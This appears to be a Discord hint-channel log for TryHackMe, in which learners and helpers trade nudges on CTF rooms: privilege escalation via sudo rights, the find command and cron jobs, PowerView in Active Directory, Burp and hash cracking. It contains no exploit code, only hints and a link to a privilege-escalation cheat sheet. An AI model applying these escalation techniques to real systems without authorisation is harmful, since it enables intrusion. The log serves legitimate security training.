In the Python playground room can anyone give me a hint for the privesc?

In the Python playground room can anyone give me a hint for the privesc?
@golden sedge go back a bit ;)

What do you mean?

well, you should have one root by now

I have found flag1 and flag2

maybe it's worth investigating that one a bit further

how do u know multiple websites are running on same ip?????

Maybe they are running on diffirent ports

you don't have to post in multiple channels and spam the same question every 2 mins

On the hydra intro/rp room,
The username I use for both questions is just molly right?

Yeah It's molly

thanks for the confirmation

hey, i'm a beginner and i'm in this room : https://tryhackme.com/room/zthlinux task 43, and, i'm just stuck, like i just dont have the perm so i can't do chmod or chown and i don't know how i'm supposed to give me sudo perms

sry for this english btw 🙂

which user have you logged in as? @alpine lantern

shiba4

i have shiba1,shiba2,shiba3 & 4

but i need root permissions for root.txt

My advice would be look closely on how to use the find command

the differents flags for this command

ok ok i'll try thx 🙂

honestly this task is way advanced if you started THM with this room

look at https://tryhackme.com/room/thefindcommand

It should help you

ok thx 🙂

Tag me if you need a bit more hints, this one is not obvious x)

it just saying that with what i learn in this room, i can found the flag

ok ok 🙂

thx

Notice what the results of sudo -l tells you and see if you can figure out what it means
@white salmon Can't see anything indicative actually

Do you know how sudo works, and how all commands/programs in linux works in general?

Notice how there's more than just /bin/cat in sudo -l

What do you think /bin/cat is- and what the 'NOPASSWD' means

Room: The Cod Caper
Task: 5 Q3
I'm not able to find ssh password any hint for it?

I have got the ssh key but it is not working

@simple shoal do u have hint for the 2 task pls x)

I have got the ssh key but it is not working
@arctic crystal The key is a rabbit hole

I'm trying to search for password

any hint where I can get that except shadow file ofcourse

There are no passwords stored in the shadow file

hashed format

They're password hashes. It doesn't store passwords.

yes

@alpine lantern you have everything you need to do it, just take the flags they give you and write a meaningful command ^^

Don't hesitate to really look at the asnwer format, that's a big hint in itself

yeah yeah ik 🙂

And read the manual

hm, what is wildcards ?

linux what are wildcards into google

let's gooo

thx

some help for number #6 task 3 ? https://tryhackme.com/room/thefindcommand

what do you got for this one ?

We are not gonna tell you what to write, but we can guide you if you already have an idea of what you should have

@alpine lantern

i just don't know what i need to put on "-perm"

like g=w ?

something like that ?

That's the good format yeah

look at the group's name

others ?

yes

you have to use it

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

Metasploit
Task 4 Question 5
I need a boost on this, I've tried googling it but I can't seem to find anything.

I tried using info but nothing works

@prisma viper Please be patient

Don't take it to multiple chats if you've just asked, it's spammy

Look at the image

Answer is given in that diagram itself

thanks 😅

@proven bridge any nudge for CCT, im stuck on in the 2nd part of the 1st chalange(pcap file), i extracted the || conversation|| , i got the|| key||, but im stuck in extracting the exact things that i need to ||decrypt||

@midnight monolith if you look at the ||encrypted conversation|| you can extract it and then ||re-play it through the same program with the same key||

i see, thanks @wooden mist

@stuck fractal you lie. The only inkling i have is the ||gnupg|| stuff, but i dont think I'm right

@oblique cliff ??

you said id be able to do wonderland already 😭

With enough research

you lie. The only inkling i have is the ||gnupg|| stuff, but i dont think I'm right
for the first privesc or horizontal pivot^

You're not right

oooo so thats the right path? 🙏

dammit lol

But you need to do some research

Start with your basic enum

okie dokie

wowie, i was expecting something crazy so i didnt even check my|| sudo|| rights 😅

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Linux - Privilege Escalation.md

@oblique cliff gnupg is the GNU privacy guard.

Flag 2 on Recovery has eluded me since the room dropped, all other flags were quick but I'm missing something obviously too simple 😆

Gnu PGP implementation

https://gnupg.org/

@fast swan confirm, it's something stupid

Go through what the malware does

And figure out what you didn't do

only interesting things I could find are ||sudo python command, but i cant edit that; and perl capabilities and I cant run that either||

gotta run, ill annoy ya more later

I had missed it the first time because I foobarred the box...

Muir, when testing it, somehow managed to break the permissions for the whole box

When he deployed it, files had the wrong permissions

Recovery?

O I thought we were still talking about wonderland

Oh Wonderland, that's still impressive

i was

wait what, so am i supposed to be able to run or change those?

I don't think you're far off for wonderland

If you're where I think you are

wait what, so am i supposed to be able to run or change those?
@oblique cliff Nope

ok then yea i wave the white flag for the day

You're on the hatter?

@ripe hedge im nowhere lol im on the box, thats it

no

Oh

im alicia keys

Gotcha

Ah right that one was tricky

At least you got her flag though

nope

Oh

Just think about that one

It's accessible

It's more simple than you think

And bloody cute

well i turned off my machine so ill think about it later

but good to know

i need some more head banging anyway

The exploit is a bit tricky

since it wasnt in her home directory i just assumed user was one of the other 2 on the box

But shouldn't be too hard with some research

It's not tricky, you can find it on google

ez to say when you made the box 🙃

Bit tricky if you've never seen it

@oblique cliff just practice practice , its all about practice

idk if thats a hint or a troll but ok...

my teacher used to tell me practice practice

Anyways, think a bit about Wonderland and you'll figure out the first flag

Considering you know where one other flag is

And I'll shut up before James kills me ;)

oh, i think i know where it is then

but i turned everything off

ill try later

Gl

That was my favourite flag because of course it is...

appreciate it

But I'd assume a native English speaker would more easily understand that one

jus cuz i speek engrish doesn mean i gud at it

I mean you speak every other language too, you can do it

I only speak google translate

Heh

The universal language

hello, I am in the linux walkthrough and I have to get password for shiba2, I have the noot.txt made, but where is the binary file located?

There's a command that's useful for finding things I believe

You should have learned a bit about it

Read the source material and understand it

hmmm

oh is that ls .? that found me shiba1

yay

yay I got the password!

Not the command I had in mind but it's been a while since I did that room. Grats

Ok this one is driving me nuts. I'm in "Linux Challenges" and i'm supposed to find flag4 where cron jobs are created. I tried crontab -e which gives me a blank/black page with nothing on it. If I cat or nano /etc/crontab it doesn't give me flag 4 either. What am i missing here? 🙂

@left sparrow ... Cron jobs run as specific entities. make sure you are polling the right one

its like handing a bunch of tasks to everyoen in the room, except your lazy brother .. then going to your lazy brother and saying "What do i gotta get done today?"

hello, I am in the linux walkthrough and I have to get password for shiba2, I have the noot.txt made, but where is the binary file located?
@glad hull The task title does tell you

yes I know I just forgot... I know it now

Decided to leave Recovery for now but wrote a script that does the room for me apart from flag 2 for next time I try the box to speed things up 😂

now the question is How do you specify which shell is used when you login? because I thaugh it's "su" or "su root" but idk what else...

and there was not a word about shell in there

the answer format tells you two characters

The task is about su

yes, but su is wrong

it's asking "how to you specify what shell is used when you use su"

@proven bridge any nudge for CCT, im stuck on in the 2nd part of the 1st chalange(pcap file), i extracted the || conversation|| , i got the|| key||, but im stuck in extracting the exact things that i need to ||decrypt||
@midnight monolith Exactly what Szymex said

I don't know man

let me think

I really have no idea

@glad hull read the manual!

I AM

Then keep reading

And you'll find it

I litteraly guessed it

Don't post answers

Read the manual for su

oh okay now I know sorry I just didn't know (I am beginner)

@fleet pike Thanks, still don't quite get it, but researching the hell out of it atm. 😉 I tried the -u flag to specify the right user, but that didn't work out. I'll keep digging.

weird, tried terminating and re-deploying and then crontab -e worked like a charm. Not too sure what went wrong for me there

in room attacktivedirectory task 3 i get two more ports then the hint and the answer suggest is that expected ?

Windows

Is there a way to get sound on the machine? I am working on flag32 under linux challenges and I need sound for the mp3 file.

^ the browser based machine

Real RDP might do it

Or you can download the file to your local machine

Hi can anyone help with room "Active Directory Basics, Task 8" I,m having problems trying to find "What is the name of the Windows 10 operating system?" can you point me in right direction , Thank

what commands have you already tried?

systeminfo, as i could not get powerview to work , I have finished all accept that one

I'd recommend getting powerview working

you’re going to have trouble without power view

why is powerview not working? What error are you getting / what command are you using

It seems to load but when you run command I get "The term 'Get-NetComputer' is not recognized as the name of a cmdlet"

Because you’re not loading correctly

show me a screenshot of how you’re loading it

hold on box has just timed out

I have realised instruction says ". .\PowerView.ps1" I did ".\PowerView.ps1" and missed a a dot is that it

That's the difference between loading a script and running it

so . . indicates running a script

No

.\ is running a script and . .\ is loading a script

Ahh thanks , going to try now

dot space dot

or dot space fullpath I believe

Thanks guys , completed

also would you know why boxes timeout in hour even though it says 2 hours

With windows? It's a bug that Skidy and Ashu are investigating

On other boxes? We're collecting info as some people have reported that

Hello, I need help with the Linux Walkthrough room, I am stuck at Task 11, question 1, The question says This challenge is pretty simple, create a file named noot.txt it says that i need to run the binary and i will be given the password for shiba2, i made my noot.txt file but how can i run it, it is a txt file not a .bin file. Thanks

nevermind, lol it meant to run the binary file shiba1

@terse kiln File extensions are a lie

Hi People; in Burp, What can we load into Comparer to see differences in what various user roles can access?

Any help would be much aprreciated.

@itj66 Try loading burp and typing some names in the answer box

This is question 5 of [Task 11] Decoder and Comparer in Burp suite. For some reason I'm stummped. the answer format is **** ****

4 astrics x 4 astrics

Pretty Please with a cherry on top?

@olive birch read the blurb in the task

It has the answer in it

which task?

This is question 5 of [Task 11] Decoder and Comparer in burp suite

So the answer is in the text of task 11?

Yes

Ok thank you very much.

Ok that was way too easy. I must be hungry. thanks again.

So question on connecting to the VPN. I'm on the nmap room, and I wasn't sure how to connect to a machine without any login credentials. I'm familiar with ssh and such for logins, but how do you do it without any logins?

Telnet was refused.

@rancid lion You're not meant to connect to that machine

The VM exists to be scanned

That's all

hello i need help with learnlinux task 11

Help or a hint?

i know how to get the answer but i dont know why

like it says to makea file called noot.txt

yes

So you do that

then it says to run the binary

Ok, so do that

Then you get the password

i just ./ right?

i dont understand why i cant open it without making the noot.txt file

Open what?

You're not opening anything

to get the password i mean

because the binary is a program

And the program was written to give you the password once you create the file

why do i need to make the file noot.txt specifically to run shiba1

You can run it without making the file

But it won't give you the password

The room creator wrote the program

Hey there!
I'm working on the Easy Peasy room. I am stuck at the GOST hash decrypting. I tried it on many websites, even the ones in writeups. But I haven't got any output even after waiting for 30 mins for cracking. Can someone guide me on how do I get past this?

Come back in a day or so

Use only the website that the hints tell you to use

The hint didn't mention any specific website, although I did use the same website that I used to answer the previous questions correctly in this room...

It applies to the whole room

That site isn't particularly reliable, it breaks often for people

Give it like 12 hours and it might work

Ohhkk... Thank You! 😃

Title: Linux Challenge, flag 15.
tried lsb_release, uname and even looked into /proc/
Need a hint

wtf?

That’s the file you need to find

@trim haven got it, ty!

:)

got stuck again. " Flag 16 lies within another system mount."

Mounts are usually CDs/USBs

oh, i should just use serach instead of asking

Google is your best friend

jeeeez, i found it

That's awesome

but it doesn't make any sense tbh

i'd never find it if i didn't use Tab

Wut

cat /media/f tab tab tab tab...

Ls /media

Then proceed

Tab completion is perfectly legit

how can i run a py script on the webapp

like example.py <target ip> <prot> is it a right syntax?

python python3 then ./script.py

python or python3 then ./script.py

i have a taks to target a webapp to find its vlun.

using that script

you tried sxample.py -h

example*